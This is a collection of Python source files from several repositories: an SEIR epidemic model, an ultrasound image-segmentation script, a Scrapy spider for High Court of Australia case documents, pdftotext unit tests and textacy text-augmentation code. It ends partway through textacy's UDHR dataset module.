from scipy.integrate import odeint
import matplotlib.pyplot as plt
from utilities import Infected

beta = 0.2      # Contact rate
sigma = 1 / 14  # 1/Latent Period (Latent Rate)
gama = 1 / 31   # 1/Recovery Period (Recovery Rate)


def coronaCases(x, t):
    n = numpy.sum(x)
    s = x[0]
    e = x[1]
    i = x[2]
    dsdt = -(beta * s * i / n)
    dedt = (beta * s * i / n) - (sigma * e)
    didt = sigma * e - gama * i
    drdt = gama * i
    return [dsdt, dedt, didt, drdt]


def Initial_data(Infected, Recovered, Deceased):
    suspectibles = (beta / gama) * Infected
    expected = sigma * beta * suspectibles / sigma * gama
    return [suspectibles, expected, Infected, Recovered]


t = numpy.linspace(0, 90, 90)  # Plotting for 90 days starting from today
x = odeint(coronaCases, Initial_data(Infected("Todays_data.csv", "KL"), 270, 2), t)
S = x[:, 0]
E = x[:, 1]
I = x[:, 2]
R = x[:, 3]

plt.ylabel('Peoples in Thousands')
plt.xlabel('Days')
plt.plot(t, S, label="suspectibles")
plt.plot(t, E, label="exposed")
plt.plot(t, I, label="infected")
plt.plot(t, R, label="recovered")
plt.legend(loc='best')
plt.show()
```
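For reference, `coronaCases` above is the standard SEIR compartment system; in the script's notation (contact rate β, latent rate σ, recovery rate γ, and N = S + E + I + R):

```latex
\frac{dS}{dt} = -\frac{\beta S I}{N}, \qquad
\frac{dE}{dt} = \frac{\beta S I}{N} - \sigma E, \qquad
\frac{dI}{dt} = \sigma E - \gamma I, \qquad
\frac{dR}{dt} = \gamma I
```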
{ "source": "8-vishal/Segmentation-using-potts-and-hierarchical-bayesian-model", "score": 3 }
#### File: 8-vishal/Segmentation-using-potts-and-hierarchical-bayesian-model/main.py
```python
import numpy
import math
import cv2
import random
import matplotlib
from scipy.special import gamma
import matplotlib.pyplot as plt
from functions import *

matplotlib.use("TkAgg")


def inverse_gamma(data, alpha=0.1, beta=0.1):
    """
    Inverse gamma distributions
    :param data: Data value
    :param alpha: alpha value
    :param beta: beta value
    :return: Inverse gamma distribution
    """
    return (pow(beta, alpha) / math.gamma(alpha)) * \
        pow(alpha, data - 1) * math.exp(-beta / data)


def shape_scale():
    """
    Generate shape and scale params
    :return:
    """
    pre_shape = numpy.random.uniform(0, 3, 16)
    pre_scale = numpy.random.uniform(0, 3, 16)
    shape = [inverse_gamma(i) for i in pre_shape]
    scale = [inverse_gamma(j) for j in pre_scale]
    return shape, scale


def noise_variance():
    """
    Noise variance sampled in inverse gamma distribution
    :return: Sampled Noise
    """
    var_list = numpy.arange(0, 3.2, 0.2)
    var = inverse_gamma(random.choice(var_list))
    return numpy.random.normal(0, var, (512, 512))


def GGD(shape, scale, path):
    """
    Generalised gaussian distribution of input image
    :param shape: Shape param of GGD
    :param scale: Scale param of GGD
    :param path: Path to image
    :return: Approximate GGD image
    """
    def ggd(x):
        p1 = 2 * pow(scale, 1 / shape) * gamma(1 + 1 / shape)
        p2 = math.exp(-pow(abs(x), shape) / scale)
        return (1 / p1) * p2

    mat = cv2.imread(path, 0)
    mat = cv2.resize(mat, (512, 512))
    mata = numpy.zeros(mat.shape)
    for i in range(len(mat)):
        for j in range(len(mat)):
            mata[i][j] = ggd(mat[i][j])
    return mat, mata


def potts_label_map_trf(image):
    """
    Find Label Map for the ground truth image
    :param image: Path to Image
    :return: Approximate segmented and labels for segmentation
    """
    img = cv2.imread(image, 0)
    img = cv2.resize(img, (512, 512))
    im = img.copy()
    '''labels = numpy.zeros((512, 512))
    for x in range(1, 511):
        for y in range(1, 511):
            if (im[x, y - 1] - 5 < im[x, y] < im[x, y - 1] + 5) and \
                    (im[x, y + 1] - 5 < im[x, y] < im[x, y + 1] + 5):
                im[x, y] = im[x, y - 1]
                labels[x, y] = 0
            elif (im[x - 1, y] - 40 < im[x, y] < im[x - 1, y] + 40) and \
                    (im[x + 1, y] - 40 < im[x, y] < im[x + 1, y] + 40):
                im[x, y] = im[x - 1, y]
                labels[x, y] = 1'''
    return energy_calc_1D(im)


def Segment(img):
    """
    Segment the image based on POTTS model
    :param img: Approximated Image
    :return: Segmented image in 4 classes
    """
    out = img.copy()
    for i in range(len(img)):
        for j in range(len(img)):
            if img[i, j] in range(0, 41):
                out[i, j] = 0
            elif img[i, j] in range(41, 100):
                out[i, j] = 1
            elif img[i, j] in range(150, 255):
                out[i, j] = 2
            else:
                out[i, j] = 3
    return out


def plot(path):
    orig, approx = GGD(0.1, 0.1, path)
    approx_seg, labels = potts_label_map_trf(path)
    final_segment = Segment(approx_seg)
    plt.figure(figsize=(20, 10))
    plt.legend()
    plt.subplot(221)
    plt.imshow(orig, cmap='gray'), plt.title("Original Image")
    plt.subplot(222)
    plt.imshow(approx, cmap='gray'), plt.title("GGD approximated Image")
    plt.subplot(223)
    plt.imshow(approx_seg, cmap='gray'), plt.title("TRF segmented Image")
    plt.subplot(224)
    plt.imshow(final_segment, cmap='jet'), plt.title("Final Segmented Image")
    plt.show()


if __name__ == "__main__":
    # To run the code just change the path and input path of the image.
    # For windows last line of code will be like - plot(path=r".\us_images\18-19-54.jpg")
    # For linux last line of code will be like - plot(path="./us_images/18-19-54.jpg")
    plot(path="./us_images/18-19-54.jpg")
```
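The nested `ggd` helper above evaluates a zero-mean generalized Gaussian density; written out with shape β and scale s, it computes:

```latex
f(x \mid \beta, s) \;=\; \frac{1}{2\, s^{1/\beta}\, \Gamma\!\left(1 + 1/\beta\right)}
\exp\!\left(-\frac{|x|^{\beta}}{s}\right)
```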
{ "source": "8W9aG/LawScraper", "score": 3 }
#### File: lawscraper/spiders/hcourt.py
```python
import typing
import re
from io import BytesIO

import scrapy
import pdftotext
from dateutil.parser import *

CASE_NAME = 'caseName'
CASE_NUMBER = 'caseNumber'
ENTITY_NAME = 'entityName'
ENTITY_CLASS = 'entityClass'
DOCUMENT_NAME = 'documentName'
DATE = 'date'


class HCourt(scrapy.Spider):
    name = "hcourt"
    start_urls = [
        "https://www.hcourt.gov.au/cases/cases-heard"
    ]
    allowed_domains = [
        "hcourt.gov.au"
    ]

    def parse(
        self, response: scrapy.http.Response
    ) -> typing.Generator[scrapy.Request, None, None]:
        """Find all the cases."""
        for case_url in response.xpath('//table[@class="cases"]/tbody/tr/td/a/@href'):
            url = response.urljoin(case_url.extract())
            yield scrapy.Request(
                url=url,
                callback=self.parse_case,
                dont_filter=True,
            )

    def parse_case(
        self, response: scrapy.http.Response
    ) -> typing.Generator[scrapy.Request, None, None]:
        """Find all the documents in the case."""
        item_full_text_div = response.xpath('//div[@class="itemFullText"]')[0]
        case_name = item_full_text_div.xpath('./h2/text()')[0].extract().strip()
        case_number = response.xpath('//h1[@class="itemTitle"]/text()')[0].extract().strip()
        for paragraph in item_full_text_div.xpath('./p'):
            paragraph_text = paragraph.xpath('string(.)').extract()[0]
            link = paragraph.xpath('./a')
            if not link:
                continue
            document_url = link[-1].xpath('./@href')[0]
            url = response.urljoin(document_url.extract())
            date = paragraph_text.split()[0]
            try:
                parse(date)
            except:
                continue
            entity_name = ''
            entity_class = ''
            braces = re.findall(r"\(.*?\)", paragraph_text)
            if braces:
                brace_text = braces[0].replace("(", "").replace(")", "")
                braces_split = [x.strip() for x in brace_text.split("-")]
                entity_name = braces_split[-1]
                if len(braces_split) > 1:
                    entity_class = braces_split[0]
            document_name = link[-1].xpath('./text()').extract()
            yield scrapy.Request(
                url=url,
                callback=self.parse_document,
                meta={
                    CASE_NAME: case_name,
                    CASE_NUMBER: case_number,
                    ENTITY_NAME: entity_name,
                    ENTITY_CLASS: entity_class,
                    DOCUMENT_NAME: document_name,
                    DATE: date,
                },
            )

    def parse_document(
        self, response: scrapy.http.Response
    ) -> typing.Generator[scrapy.Request, None, None]:
        """Parse the document from a case."""
        if not isinstance(response, scrapy.http.TextResponse):
            pdf = pdftotext.PDF(BytesIO(response.body))
            text = "\n\n".join(pdf)
            yield {
                'text': text,
                'url': response.url,
                CASE_NAME: response.meta[CASE_NAME],
                CASE_NUMBER: response.meta[CASE_NUMBER],
                ENTITY_NAME: response.meta[ENTITY_NAME],
                ENTITY_CLASS: response.meta[ENTITY_CLASS],
                DOCUMENT_NAME: response.meta[DOCUMENT_NAME],
                DATE: response.meta[DATE],
            }
```
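A minimal sketch of running the spider programmatically, assuming the file is importable as `hcourt.py` and Scrapy ≥ 2.1 (the `FEEDS` setting) is installed; the output filename is an arbitrary choice:

```python
from scrapy.crawler import CrawlerProcess
from hcourt import HCourt

# Write each yielded document as a JSON line.
process = CrawlerProcess(settings={"FEEDS": {"hcourt_documents.jl": {"format": "jsonlines"}}})
process.crawl(HCourt)
process.start()
```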
{ "source": "8W9aG/pdftotext", "score": 3 }
#### File: pdftotext/tests/test_pdf.py ```python import io import pkg_resources import unittest import pdftotext file_names = [ "abcde.pdf", "blank.pdf", "both_passwords.pdf", "corrupt.pdf", "corrupt_page.pdf", "landscape_0.pdf", "landscape_90.pdf", "portrait.pdf", "table.pdf", "three_columns.pdf", "two_pages.pdf", "user_password.pdf", ] test_files = {} for file_name in file_names: file_path = pkg_resources.resource_filename("tests", file_name) with open(file_path, "rb") as open_file: test_files[file_name] = io.BytesIO(open_file.read()) def get_file(name): """Return a copy of the requested test file as if it were just opened.""" return io.BytesIO(test_files[name].getvalue()) class InitTest(unittest.TestCase): """Test using and abusing __init__.""" def test_double_init_success(self): pdf = pdftotext.PDF(get_file("abcde.pdf")) pdf.__init__(get_file("blank.pdf")) self.assertEqual(len(pdf), 1) def test_double_init_failure(self): pdf = pdftotext.PDF(get_file("blank.pdf")) with self.assertRaises(AttributeError): pdf.__init__("wrong") def test_init_file_in_text_mode(self): text_file = io.StringIO(u"wrong") with self.assertRaises((pdftotext.Error, TypeError)): pdftotext.PDF(text_file) def test_init_invalid_pdf_file(self): pdf_file = io.BytesIO(b"wrong") with self.assertRaises(pdftotext.Error): pdftotext.PDF(pdf_file) def test_init_corrupt_pdf_file(self): with self.assertRaises(pdftotext.Error): pdftotext.PDF(get_file("corrupt.pdf")) def test_no_init(self): class BrokenPDF(pdftotext.PDF): def __init__(self): pass pdf = BrokenPDF() self.assertEqual(len(pdf), 0) def test_locked_with_only_user_password(self): with self.assertRaises(pdftotext.Error): pdftotext.PDF(get_file("user_password.pdf")) def test_locked_with_only_user_password_user_unlock(self): pdf = pdftotext.PDF(get_file("user_password.pdf"), "user_password") self.assertIn("secret", pdf[0]) def test_locked_with_both_passwords(self): with self.assertRaises(pdftotext.Error): pdftotext.PDF(get_file("both_passwords.pdf")) def test_locked_with_both_passwords_user_unlock(self): pdf = pdftotext.PDF(get_file("both_passwords.pdf"), "user_password") self.assertIn("secret", pdf[0]) def test_locked_with_both_passwords_owner_unlock(self): pdf = pdftotext.PDF(get_file("both_passwords.pdf"), "owner_password") self.assertIn("secret", pdf[0]) class GetItemTest(unittest.TestCase): """Test the __getitem__ method.""" def test_read(self): pdf = pdftotext.PDF(get_file("abcde.pdf")) result = pdf[0] self.assertIn("abcde", result) def test_read_portrait(self): pdf = pdftotext.PDF(get_file("portrait.pdf")) result = pdf[0] self.assertIn("a", result) self.assertIn("b", result) self.assertIn("c", result) self.assertIn("d", result) def test_read_landscape_0(self): pdf = pdftotext.PDF(get_file("landscape_0.pdf")) result = pdf[0] self.assertIn("a", result) self.assertIn("b", result) self.assertIn("c", result) self.assertIn("d", result) def test_read_landscape_90(self): pdf = pdftotext.PDF(get_file("landscape_90.pdf")) result = pdf[0] self.assertIn("a", result) self.assertIn("b", result) self.assertIn("c", result) self.assertIn("d", result) @unittest.skip("skip until all test runners have poppler >= 0.88") def test_read_columns(self): pdf = pdftotext.PDF(get_file("three_columns.pdf")) page = pdf[0] col1_index = page.index("column 1") one_index = page.index("one") col2_index = page.index("column 2") two_index = page.index("two") col3_index = page.index("column 3") three_index = page.index("three") self.assertLess(col1_index, one_index) self.assertLess(one_index, col2_index) 
self.assertLess(col2_index, two_index) self.assertLess(two_index, col3_index) self.assertLess(col3_index, three_index) def test_no_doc_to_read(self): class BrokenPDF(pdftotext.PDF): def __init__(self): pass pdf = BrokenPDF() with self.assertRaises(IndexError): pdf[0] def test_pdf_read_invalid_page_number(self): pdf = pdftotext.PDF(get_file("blank.pdf")) with self.assertRaises(IndexError): pdf[100] def test_pdf_read_wrong_arg_type(self): pdf = pdftotext.PDF(get_file("blank.pdf")) with self.assertRaises(TypeError): pdf["wrong"] def test_read_corrupt_page(self): with self.assertRaises((pdftotext.Error, IndexError)): pdf = pdftotext.PDF(get_file("corrupt_page.pdf")) pdf[0] def test_read_page_two(self): pdf = pdftotext.PDF(get_file("two_pages.pdf")) result = pdf[1] self.assertIn("two", result) class LengthTest(unittest.TestCase): """Test the __len__ method.""" def test_length_one(self): pdf = pdftotext.PDF(get_file("blank.pdf")) self.assertEqual(len(pdf), 1) def test_length_two(self): pdf = pdftotext.PDF(get_file("two_pages.pdf")) self.assertEqual(len(pdf), 2) def test_length_no_doc(self): class BrokenPDF(pdftotext.PDF): def __init__(self): pass pdf = BrokenPDF() self.assertEqual(len(pdf), 0) class ListTest(unittest.TestCase): """Test iterating over pages.""" def test_list_first_element(self): pdf = pdftotext.PDF(get_file("two_pages.pdf")) self.assertIn("one", pdf[0]) def test_list_second_element(self): pdf = pdftotext.PDF(get_file("two_pages.pdf")) self.assertIn("two", pdf[1]) def test_list_invalid_element(self): pdf = pdftotext.PDF(get_file("two_pages.pdf")) with self.assertRaises(IndexError): pdf[2] def test_list_last_element(self): pdf = pdftotext.PDF(get_file("two_pages.pdf")) self.assertIn("two", pdf[-1]) def test_for_loop(self): pdf = pdftotext.PDF(get_file("two_pages.pdf")) result = "" for page in pdf: result = result + page self.assertIn("one", result) self.assertIn("two", result) class RawTest(unittest.TestCase): """Test reading in raw layout.""" def test_raw_vs_not(self): filename = "table.pdf" pdf = pdftotext.PDF(get_file(filename)) raw_pdf = pdftotext.PDF(get_file(filename), raw=True) self.assertNotEqual(pdf[0], raw_pdf[0]) def test_raw_invalid_type(self): with self.assertRaises(TypeError): pdftotext.PDF(get_file("blank.pdf"), raw="") def test_raw_invalid_value(self): with self.assertRaises(ValueError): pdftotext.PDF(get_file("blank.pdf"), raw=100) def test_raw_is_not_default(self): filename = "table.pdf" pdf_default = pdftotext.PDF(get_file(filename)) pdf_raw_false = pdftotext.PDF(get_file(filename), raw=False) self.assertEqual(pdf_default[0], pdf_raw_false[0]) class PhysicalTest(unittest.TestCase): """Test reading in physical layout.""" @unittest.skip("skip until all test runners have poppler >= 0.88") def test_physical_vs_not(self): filename = "three_columns.pdf" pdf = pdftotext.PDF(get_file(filename)) physical_pdf = pdftotext.PDF(get_file(filename), physical=True) self.assertNotEqual(pdf[0], physical_pdf[0]) def test_physical_invalid_type(self): with self.assertRaises(TypeError): pdftotext.PDF(get_file("blank.pdf"), physical="") def test_physical_invalid_value(self): with self.assertRaises(ValueError): pdftotext.PDF(get_file("blank.pdf"), physical=-10) def test_physical_is_not_default(self): filename = "three_columns.pdf" pdf_default = pdftotext.PDF(get_file(filename)) pdf_physical_false = pdftotext.PDF(get_file(filename), physical=False) self.assertEqual(pdf_default[0], pdf_physical_false[0]) def test_raw_and_physical(self): with self.assertRaises(ValueError): 
pdftotext.PDF(get_file("blank.pdf"), raw=True, physical=True) def test_raw_vs_physical(self): filename = "three_columns.pdf" pdf_raw = pdftotext.PDF(get_file(filename), raw=True) pdf_physical = pdftotext.PDF(get_file(filename), physical=True) self.assertNotEqual(pdf_raw[0], pdf_physical[0]) ```
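A minimal, self-contained sketch of the fixture pattern the suite above relies on: file bytes are cached once, and every call hands out a fresh `io.BytesIO`, so no test can disturb another by consuming or seeking a shared stream. The `load()` helper below is illustrative, not part of the test suite.

```python
import io
import tempfile

_cache = {}

def load(path):
    """Read ``path`` once, then hand out an independent stream per call."""
    if path not in _cache:
        with open(path, "rb") as f:
            _cache[path] = f.read()
    return io.BytesIO(_cache[path])

# demo with a throwaway file: each caller gets its own read cursor
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"%PDF-1.4 stub")
a, b = load(tmp.name), load(tmp.name)
a.read()                              # exhausting one copy...
assert b.read() == b"%PDF-1.4 stub"   # ...leaves the other intact
```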
{ "source": "8W9aG/textacy", "score": 3 }
#### File: textacy/augmentation/transforms.py ```python import random from typing import cast, List, Optional, Set, Union from cytoolz import itertoolz from .. import errors, utils from . import utils as aug_utils def substitute_word_synonyms( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, pos: Optional[Union[str, Set[str]]] = None, ) -> List[aug_utils.AugTok]: """ Randomly substitute words for which synonyms are available with a randomly selected synonym, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through synonym substitution. num: If int, maximum number of words with available synonyms to substitute with a randomly selected synonym; if float, probability that a given word with synonyms will be substituted. pos: Part of speech tag(s) of words to be considered for augmentation. If None, all words with synonyms are considered. Returns: New, augmented sequence of tokens. Note: This transform requires :class:`textacy.resources.ConceptNet` to be downloaded to work properly, since this is the data source for word synonyms to be substituted. """ _validate_aug_toks(aug_toks) pos = cast(Set[str], utils.to_collection(pos, str, set)) cand_idxs = [ idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.syns and (pos is None or aug_tok.pos in pos) ] rand_idxs = set(_select_random_candidates(cand_idxs, num)) if not rand_idxs: return aug_toks[:] new_aug_toks = [] for idx, aug_tok in enumerate(aug_toks): if idx in rand_idxs: new_aug_toks.append( aug_utils.AugTok( text=random.choice(aug_tok.syns), ws=aug_tok.ws, pos=aug_tok.pos, is_word=aug_tok.is_word, syns=aug_tok.syns, # TODO: re-fetch syns? use []? ) ) else: new_aug_toks.append(aug_tok) return new_aug_toks def insert_word_synonyms( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, pos: Optional[Union[str, Set[str]]] = None, ) -> List[aug_utils.AugTok]: """ Randomly insert random synonyms of tokens for which synonyms are available, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through synonym insertion. num: If int, maximum number of words with available synonyms from which a random synonym is selected and randomly inserted; if float, probability that a given word with synonyms will provide a synonym to be inserted. pos: Part of speech tag(s) of words to be considered for augmentation. If None, all words with synonyms are considered. Returns: New, augmented sequence of tokens. Note: This transform requires :class:`textacy.resources.ConceptNet` to be downloaded to work properly, since this is the data source for word synonyms to be inserted. 
""" _validate_aug_toks(aug_toks) pos = cast(Set[str], utils.to_collection(pos, str, set)) # bail out on very short sentences to avoid clobbering meaning if len(aug_toks) < 3: return aug_toks[:] cand_aug_toks = [ aug_tok for aug_tok in aug_toks if aug_tok.syns and (pos is None or aug_tok.pos in pos) ] rand_aug_toks = _select_random_candidates(cand_aug_toks, num) rand_idxs = random.sample(range(len(aug_toks)), len(rand_aug_toks)) if not rand_idxs: return aug_toks[:] rand_aug_toks = iter(rand_aug_toks) new_aug_toks: List[aug_utils.AugTok] = [] # NOTE: https://github.com/python/mypy/issues/5492 padded_pairs = itertoolz.sliding_window(2, [None] + aug_toks) # type: ignore for idx, (prev_tok, curr_tok) in enumerate(padded_pairs): if idx in rand_idxs: rand_aug_tok = next(rand_aug_toks) if prev_tok: # use previous token's whitespace for inserted synonym new_tok_ws = prev_tok.ws if prev_tok.is_word and not prev_tok.ws: # previous token should have whitespace, if a word new_aug_toks[-1] = aug_utils.AugTok( text=prev_tok.text, ws=" ", pos=prev_tok.pos, is_word=True, syns=prev_tok.syns, ) else: new_tok_ws = " " new_aug_toks.append( aug_utils.AugTok( text=random.choice(rand_aug_tok.syns), ws=new_tok_ws, pos=rand_aug_tok.pos, is_word=rand_aug_tok.is_word, syns=rand_aug_tok.syns, # TODO: re-fetch syns? use []? ) ) new_aug_toks.append(curr_tok) return new_aug_toks def swap_words( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, pos: Optional[Union[str, Set[str]]] = None, ) -> List[aug_utils.AugTok]: """ Randomly swap the positions of two *adjacent* words, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through position swapping. num: If int, maximum number of adjacent word pairs to swap; if float, probability that a given word pair will be swapped. pos: Part of speech tag(s) of words to be considered for augmentation. If None, all words are considered. Returns: New, augmented sequence of tokens. """ _validate_aug_toks(aug_toks) pos = cast(Set[str], utils.to_collection(pos, str, set)) # if we don't require _adjacent_ words, this does the trick # if not pos: # pos = set(aug_tok.pos for aug_tok in aug_toks if aug_tok.is_word) # cand_idx_pairs = list( # itertools.chain.from_iterable( # itertools.combinations( # (idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.pos == pos_), # 2, # ) # for pos_ in pos # ) # ) cand_idxs = ( idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.is_word and (pos is None or aug_tok.pos in pos) ) cand_idx_pairs = [ (idx1, idx2) for idx1, idx2 in itertoolz.sliding_window(2, cand_idxs) if idx2 - idx1 == 1 ] rand_idx_pairs = _select_random_candidates(cand_idx_pairs, num) if not rand_idx_pairs: return aug_toks[:] new_aug_toks = aug_toks[:] for idx1, idx2 in rand_idx_pairs: tok1 = new_aug_toks[idx1] tok2 = new_aug_toks[idx2] new_aug_toks[idx1] = aug_utils.AugTok( text=tok2.text, ws=tok1.ws, pos=tok2.pos, is_word=tok2.is_word, syns=tok2.syns, ) new_aug_toks[idx2] = aug_utils.AugTok( text=tok1.text, ws=tok2.ws, pos=tok1.pos, is_word=tok1.is_word, syns=tok1.syns, ) return new_aug_toks def delete_words( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, pos: Optional[Union[str, Set[str]]] = None, ) -> List[aug_utils.AugTok]: """ Randomly delete words, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through word deletion. num: If int, maximum number of words to delete; if float, probability that a given word will be deleted. 
pos: Part of speech tag(s) of words to be considered for augmentation. If None, all words are considered. Returns: New, augmented sequence of tokens. """ _validate_aug_toks(aug_toks) pos = cast(Set[str], utils.to_collection(pos, str, set)) # bail out on very short sentences to avoid clobbering meaning if len(aug_toks) < 3: return aug_toks[:] cand_idxs = [ idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.is_word and (pos is None or aug_tok.pos in pos) and idx > 0 ] rand_idxs = set(_select_random_candidates(cand_idxs, num)) if not rand_idxs: return aug_toks[:] new_aug_toks: List[aug_utils.AugTok] = [] # NOTE: https://github.com/python/mypy/issues/5492 padded_triplets = itertoolz.sliding_window( 3, [None] + aug_toks + [None], # type: ignore ) for idx, (prev_tok, curr_tok, next_tok) in enumerate(padded_triplets): if idx in rand_idxs: # special case: word then [deleted word] then punctuation # give deleted word's whitespace to previous word if prev_tok and next_tok and prev_tok.is_word and not next_tok.is_word: new_aug_toks[-1] = aug_utils.AugTok( text=prev_tok.text, ws=curr_tok.ws, pos=prev_tok.pos, is_word=prev_tok.is_word, syns=prev_tok.syns, ) else: new_aug_toks.append(curr_tok) return new_aug_toks def substitute_chars( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, lang: Optional[str] = None, ) -> List[aug_utils.AugTok]: """ Randomly substitute a single character in randomly-selected words with another, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through character substitution. num: If int, maximum number of words to modify with a random character substitution; if float, probability that a given word will be modified. lang: Standard, two-letter language code corresponding to ``aug_toks``. Used to load a weighted distribution of language-appropriate characters that are randomly selected for substitution. More common characters are more likely to be substituted. If not specified, ascii letters and digits are randomly selected with equal probability. Returns: New, augmented sequence of tokens. Note: This transform requires :class:`textacy.datasets.UDHR` to be downloaded to work properly, since this is the data source for character weights when deciding which char(s) to insert. """ _validate_aug_toks(aug_toks) char_weights = aug_utils.get_char_weights(lang or "xx") cand_idxs = [ idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.is_word and len(aug_tok.text) >= 3 ] rand_idxs = set(_select_random_candidates(cand_idxs, num)) if not rand_idxs: return aug_toks[:] rand_chars = iter( random.choices( [char for char, _ in char_weights], weights=[weight for _, weight in char_weights], k=len(rand_idxs), ) ) new_aug_toks = [] for idx, aug_tok in enumerate(aug_toks): if idx in rand_idxs: text_list = list(aug_tok.text) rand_char_idx = random.choice(range(len(text_list))) text_list[rand_char_idx] = next(rand_chars) new_aug_toks.append( aug_utils.AugTok( text="".join(text_list), ws=aug_tok.ws, pos=aug_tok.pos, is_word=aug_tok.is_word, syns=aug_tok.syns, ) ) else: new_aug_toks.append(aug_tok) return new_aug_toks def insert_chars( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, lang: Optional[str] = None, ) -> List[aug_utils.AugTok]: """ Randomly insert a character into randomly-selected words, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through character insertion. 
num: If int, maximum number of words to modify with a random character insertion; if float, probability that a given word will be modified. lang: Standard, two-letter language code corresponding to ``aug_toks``. Used to load a weighted distribution of language-appropriate characters that are randomly selected for substitution. More common characters are more likely to be substituted. If not specified, ascii letters and digits are randomly selected with equal probability. Returns: New, augmented sequence of tokens. Note: This transform requires :class:`textacy.datasets.UDHR` to be downloaded to work properly, since this is the data source for character weights when deciding which char(s) to insert. """ _validate_aug_toks(aug_toks) char_weights = aug_utils.get_char_weights(lang or "xx") cand_idxs = [ idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.is_word and len(aug_tok.text) >= 3 ] rand_idxs = set(_select_random_candidates(cand_idxs, num)) if not rand_idxs: return aug_toks[:] rand_chars = iter( random.choices( [char for char, _ in char_weights], weights=[weight for _, weight in char_weights], k=len(rand_idxs), ) ) new_aug_toks = [] for idx, aug_tok in enumerate(aug_toks): if idx in rand_idxs: text_list = list(aug_tok.text) rand_char_idx = random.choice(range(len(text_list))) text_list.insert(rand_char_idx, next(rand_chars)) new_aug_toks.append( aug_utils.AugTok( text="".join(text_list), ws=aug_tok.ws, pos=aug_tok.pos, is_word=aug_tok.is_word, syns=aug_tok.syns, ) ) else: new_aug_toks.append(aug_tok) return new_aug_toks def swap_chars( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, ) -> List[aug_utils.AugTok]: """ Randomly swap two *adjacent* characters in randomly-selected words, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through character swapping. num: If int, maximum number of words to modify with a random character swap; if float, probability that a given word will be modified. Returns: New, augmented sequence of tokens. """ _validate_aug_toks(aug_toks) cand_idxs = [ idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.is_word and len(aug_tok.text) >= 3 ] rand_idxs = set(_select_random_candidates(cand_idxs, num)) if not rand_idxs: return aug_toks[:] new_aug_toks = [] for idx, aug_tok in enumerate(aug_toks): if idx in rand_idxs: text_list = list(aug_tok.text) idx = random.choice(range(1, len(text_list))) text_list[idx - 1], text_list[idx] = text_list[idx], text_list[idx - 1] new_aug_toks.append( aug_utils.AugTok( text="".join(text_list), ws=aug_tok.ws, pos=aug_tok.pos, is_word=aug_tok.is_word, syns=aug_tok.syns, ) ) else: new_aug_toks.append(aug_tok) return new_aug_toks def delete_chars( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, ) -> List[aug_utils.AugTok]: """ Randomly delete a character in randomly-selected words, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through character deletion. num: If int, maximum number of words to modify with a random character deletion; if float, probability that a given word will be modified. Returns: New, augmented sequence of tokens. 
""" _validate_aug_toks(aug_toks) cand_idxs = [ idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.is_word and len(aug_tok.text) >= 3 ] rand_idxs = set(_select_random_candidates(cand_idxs, num)) if not rand_idxs: return aug_toks[:] new_aug_toks = [] for idx, aug_tok in enumerate(aug_toks): if idx in rand_idxs: rand_char_idx = random.choice(range(len(aug_tok.text))) text = "".join( char for char_idx, char in enumerate(aug_tok.text) if char_idx != rand_char_idx ) new_aug_toks.append( aug_utils.AugTok( text=text, ws=aug_tok.ws, pos=aug_tok.pos, is_word=aug_tok.is_word, syns=aug_tok.syns, ) ) else: new_aug_toks.append(aug_tok) return new_aug_toks def _validate_aug_toks(aug_toks): if not (isinstance(aug_toks, list) and isinstance(aug_toks[0], aug_utils.AugTok)): raise TypeError( errors.type_invalid_msg("aug_toks", type(aug_toks), List[aug_utils.AugTok]) ) def _select_random_candidates(cands, num): """ Args: cands (List[obj]) num (int or float) Returns: List[obj] """ if isinstance(num, int) and num >= 0: rand_cands = random.sample(cands, min(num, len(cands))) elif isinstance(num, float) and 0.0 <= num <= 1.0: rand_cands = [cand for cand in cands if random.random() < num] else: raise ValueError( f"num={num} is invalid; must be an int >= 0 or a float in [0.0, 1.0]" ) return rand_cands ``` #### File: textacy/datasets/udhr.py ```python import io import itertools import logging import pathlib import xml from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Union from .. import constants, preprocessing, utils from .. import io as tio from .base import Dataset LOGGER = logging.getLogger(__name__) NAME = "udhr" META = { "site_url": "http://www.ohchr.org/EN/UDHR", "description": ( "A collection of translations of the Universal Declaration of Human Rights (UDHR), " "a milestone document in the history of human rights that first, formally established " "fundamental human rights to be universally protected." ), } DOWNLOAD_URL = "https://unicode.org/udhr/assemblies/udhr_txt.zip" class UDHR(Dataset): """ Stream a collection of UDHR translations from disk, either as texts or text + metadata pairs. Download the data (one time only!), saving and extracting its contents to disk:: >>> import textacy.datasets >>> ds = textacy.datasets.UDHR() >>> ds.download() >>> ds.info {'name': 'udhr', 'site_url': 'http://www.ohchr.org/EN/UDHR', 'description': 'A collection of translations of the Universal Declaration of Human Rights (UDHR), a milestone document in the history of human rights that first, formally established fundamental human rights to be universally protected.'} Iterate over translations as texts or records with both text and metadata:: >>> for text in ds.texts(limit=5): ... print(text[:500]) >>> for text, meta in ds.records(limit=5): ... print("\\n{} ({})\\n{}".format(meta["lang_name"], meta["lang"], text[:500])) Filter translations by language, and note that some languages have multiple translations:: >>> for text, meta in ds.records(lang="en"): ... 